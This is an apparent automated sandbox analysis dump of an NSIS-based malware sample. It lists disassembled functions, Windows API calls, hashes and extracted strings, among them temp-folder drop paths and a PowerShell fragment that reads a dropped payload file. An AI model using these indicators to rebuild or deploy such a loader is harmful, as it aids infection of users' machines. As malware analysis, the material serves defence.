                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                        • String ID: "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu$"C:\Users\user\Desktop\Cpfkf79Rzk.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu

Control-flow Graph (function 40542b; legend: Executed, Not Executed)
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                        • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                          • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                                        • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                        • ShowWindow.USER32(00000008), ref: 00405673
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                        • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                        • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                        • EmptyClipboard.USER32 ref: 00405753
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                        • CloseClipboard.USER32 ref: 004057AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                        • String ID: dL${$6B
                                                                                                        • API String ID: 590372296-1213295897
                                                                                                        • Opcode ID: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                                                        • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                        • Opcode Fuzzy Hash: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                                                        • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                        • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                                        • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                        • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 004065D2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                        • String ID: 8gB
                                                                                                        • API String ID: 2295610775-1733800166
                                                                                                        • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                        • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                        • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                        • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\depersonaliseredes, xrefs: 004021C3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInstance
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\depersonaliseredes
                                                                                                        • API String ID: 542301482-2980550815
                                                                                                        • Opcode ID: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                                                        • Instruction ID: 81793f1010fc2e559759275c5502ec42cf4e228633e8d7c3619733a9a8aee0f9
                                                                                                        • Opcode Fuzzy Hash: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                                                        • Instruction Fuzzy Hash: 34414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                                                        • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                                                        • Opcode Fuzzy Hash: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                                                        • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                        • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                        • DestroyWindow.USER32 ref: 00403D8F
                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                                        • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                        • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                        • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                        • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                        • String ID: dL$6B
                                                                                                        • API String ID: 3282139019-3137750261
                                                                                                        • Opcode ID: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                                                        • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                        • Opcode Fuzzy Hash: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                                                        • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                                                        Control-flow Graph: first basic block 403974-40398c
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                          • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                        • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000), ref: 004039F5
                                                                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A75
                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A93
                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes), ref: 00403ADC
                                                                                                          • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                        • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                        • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                        • API String ID: 1975747703-1343068273
                                                                                                        • Opcode ID: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                                                        • Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
                                                                                                        • Opcode Fuzzy Hash: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                                                        • Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D

                                                                                                        Control-flow Graph: first basic block 402edd-402f2b
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                          • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                          • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                        Strings
                                                                                                        • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                        • Error launching installer, xrefs: 00402F2D
                                                                                                        • soft, xrefs: 00402FCB
                                                                                                        • Null, xrefs: 00402FD4
                                                                                                        • "C:\Users\user\Desktop\Cpfkf79Rzk.exe", xrefs: 00402EDD
                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                        • Inst, xrefs: 00402FC2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                        • API String ID: 4283519449-2531506104
                                                                                                        • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                        • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                        • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                        • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                                                                                        Control-flow Graph: first basic block 4062a6-4062b1
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063E7
                                                                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405323,Completed,00000000), ref: 004063FA
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Completed,?,00405323,Completed,00000000), ref: 00406436
                                                                                                        • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 00406444
                                                                                                        • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                        • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405323,Completed,00000000), ref: 004064CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                        • String ID: "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                        • API String ID: 717251189-1499416109
                                                                                                        • Opcode ID: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                                                        • Instruction ID: e6e4ebc4b258379f565b747a0f7be2a01952c0151b7e77293941e8e44b6b8026
                                                                                                        • Opcode Fuzzy Hash: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
                                                                                                        • Instruction Fuzzy Hash: 12611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                                                                                        Control-flow Graph: first basic block 40176f-401794
                                                                                                        APIs
                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,Polystichoid,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017B0
                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Polystichoid,Polystichoid,00000000,00000000,Polystichoid,C:\Users\user~1\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017D5
                                                                                                          • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                          • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                          • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                          • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                          • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini$Polystichoid$nerveklinikkernes
                                                                                                        • API String ID: 1941528284-2410793280

                                                                                                        Control-flow Graph (function 004052EC)
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                        • lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                        • lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                                                        • SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                        • String ID: Completed
                                                                                                        • API String ID: 2531174081-3087654605

                                                                                                        Control-flow Graph (function 004065EE)
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                        • wsprintfW.USER32 ref: 00406640
                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                                                        • API String ID: 2200240437-1946221925

                                                                                                        Control-flow Graph (function 00403116)
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$wsprintf
                                                                                                        • String ID: ... %d%%
                                                                                                        • API String ID: 551687249-2449383134

                                                                                                        Control-flow Graph (function 00405DA9)
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403357,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3), ref: 00405DE2
                                                                                                        Similarity
                                                                                                        • API ID: CountFileNameTempTick
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                        • API String ID: 1716503409-3194598332

                                                                                                        Control-flow Graph (function 004023E4)
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,00000023,00000011,00000002), ref: 0040242F
                                                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 0040246F
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 00402557
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseValuelstrlen
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini
                                                                                                        • API String ID: 2655323295-804212927
                                                                                                        • Opcode ID: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                                                        • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                                                        • Opcode Fuzzy Hash: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
                                                                                                        • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 681 402d44-402d6d call 4060f1 683 402d72-402d74 681->683 684 402d76-402d7c 683->684 685 402dec-402df0 683->685 686 402d98-402dad RegEnumKeyW 684->686 687 402d7e-402d80 686->687 688 402daf-402dc1 RegCloseKey call 40665e 686->688 689 402dd0-402dde RegCloseKey 687->689 690 402d82-402d96 call 402d44 687->690 695 402de0-402de6 RegDeleteKeyW 688->695 696 402dc3-402dce 688->696 689->685 690->686 690->688 695->685 696->685
                                                                                                        APIs
                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
